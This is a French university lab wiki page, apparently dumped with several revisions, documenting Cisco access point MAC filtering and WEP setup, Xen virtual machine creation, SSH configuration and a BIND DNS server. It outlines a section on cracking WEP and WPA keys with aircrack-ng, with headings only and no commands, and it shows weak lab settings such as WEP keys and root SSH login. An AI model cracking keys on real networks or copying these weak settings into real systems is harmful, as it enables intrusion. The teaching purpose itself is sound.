RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre><br />
<br />
Serveur DNS<br />
modification du fichier /var/cache/bind option<br />
<pre><br />
nano /etc/bind/named.conf.options <br />
<br />
<br />
<br />
59 apt-get install vim strace tcpdump <br />
60 apt-get install host<br />
61 host -t ni love-in-the-world.space<br />
62 host -t any love-in-the-world.space<br />
68 vim named.conf.options <br />
69 cp db.local db.love-in-the-world<br />
70 cat named.conf.default-zones <br />
71 vim named.conf.local <br />
73 vim db.love-in-the-world <br />
service bind9 stop<br />
76 service bind9 start<br />
77 cat /var/log/daemon.log<br />
78 vim db.love-in-the-world <br />
service bind9 stop<br />
vim db.love-in-the-world <br />
service bind9 start<br />
cat /var/log/daemon.log<br />
cat /var/log/daemon.log<br />
</pre><br />
<br />
<h2>Partie III - Installation de Debian sur les nouvelles machines </h2><br />
<br />
<br />
<h2>Partie IV - Cassage d'une cles Wifi </h2><br />
<h4>a) Préparation </h4><br />
- Instalation aircrack-ng<br />
<br />
- Instalation du port usb-Wifi<br />
<br />
<h4>b) Cassage d'une cles WEP </h4><br />
<h4>c) Cassage d'une cles WPA</h4><br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22776
TP sysres IMA2a5 2015/2016 G3
2015-11-06T11:36:22Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
on se connecte a notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-get purge systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre><br />
<br />
Serveur DNS<br />
modification du fichier /var/cache/bind option<br />
<pre><br />
<br />
1 /etc/ssh/sshd_config<br />
2 vim /etc/ssh/sshd_config<br />
3 /etc/ssh/sshd_config<br />
4 ls <br />
5 vi /etc/ssh/sshd_config<br />
6 vi /etc/network/interfaces<br />
7 ifdown eth0<br />
8 ifup eth0<br />
9 apt-get purge network-manager<br />
10 apt-get purge systemd<br />
11 apt-get purge network-manager systemd<br />
12 apt-get purge systemd<br />
13 apt-get purge network-manager systemd<br />
14 ifup eth0<br />
15 vi /etc/ssh/sshd_config<br />
16 route -n<br />
17 cat /etc/network/interfaces<br />
18 nano /etc/network/interfaces<br />
19 apt-get purge network-manager systemd<br />
20 apt-get purge network-manager <br />
21 apt-get purge systemd<br />
22 ifdown eth0<br />
23 ifup eth0<br />
24 apt-get purge systemd<br />
25 route -n<br />
26 apt-get purge systemd<br />
27 apt-get purge systemd<br />
28 route -n<br />
29 reboot<br />
30 /etc/ssh/sshd_config<br />
31 su<br />
32 apt-get purge network-manager systemd<br />
33 nano /etc/inittab <br />
34 cat /etc/inittab <br />
35 apt-get purge systemd<br />
36 reboot<br />
37 apt-get purge systemd<br />
38 ping www.google.com<br />
39 bind9<br />
40 /etc/bind/<br />
41 apt-get bind9<br />
42 apt-get install bind9<br />
43 cat /etc/bind/named.conf<br />
44 cat /etc/bind/named.conf.options <br />
45 cat /etc/bind/named.conf.local <br />
46 apt-get install bind9-doc<br />
47 show ip <br />
48 showip<br />
49 cat /etc/network/interfaces<br />
50 apt-get install ssh<br />
51 apt-get install apache2<br />
52 cat /var/log/daemon.log <br />
53 host www.hunt3r.lol localhost<br />
54 vi /etc/bind/named.conf.options<br />
55 vi /etc/bind/named.conf.local<br />
56 vi /etc/bind/named.conf.options <br />
57 vim /etc/bind/named.conf.options <br />
58 nano /etc/bind/named.conf.options <br />
59 apt-get install vim strace tcpdump <br />
60 apt-get install host<br />
61 host -t ni love-in-the-world.space<br />
62 host -t any love-in-the-world.space<br />
63 cd /etc/bind<br />
64 ls<br />
65 vim named.conf<br />
66 cat named.conf<br />
67 ls<br />
68 vim named.conf.options <br />
69 cp db.local db.love-in-the-world<br />
70 cat named.conf.default-zones <br />
71 vim named.conf.local <br />
72 cat named.conf.local <br />
73 vim db.love-in-the-world <br />
74 vim db.love-in-the-world <br />
75 service bind9 stop<br />
76 service bind9 start<br />
77 cat /var/log/daemon.log<br />
78 vim db.love-in-the-world <br />
79 service bind9 stop<br />
80 vim db.love-in-the-world <br />
81 service bind9 start<br />
82 cat /var/log/daemon.log<br />
83 cat /var/log/daemon.log<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22774
TP sysres IMA2a5 2015/2016 G3
2015-11-06T11:08:39Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
on se connecte a notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-get purge systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre><br />
<br />
Serveur DNS<br />
modification du fichier /var/cache/bind option<br />
<pre><br />
<br />
<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22770
TP sysres IMA2a5 2015/2016 G3
2015-11-06T09:45:08Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
on se connecte a notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-get purge systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22767
TP sysres IMA2a5 2015/2016 G3
2015-11-06T09:43:18Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
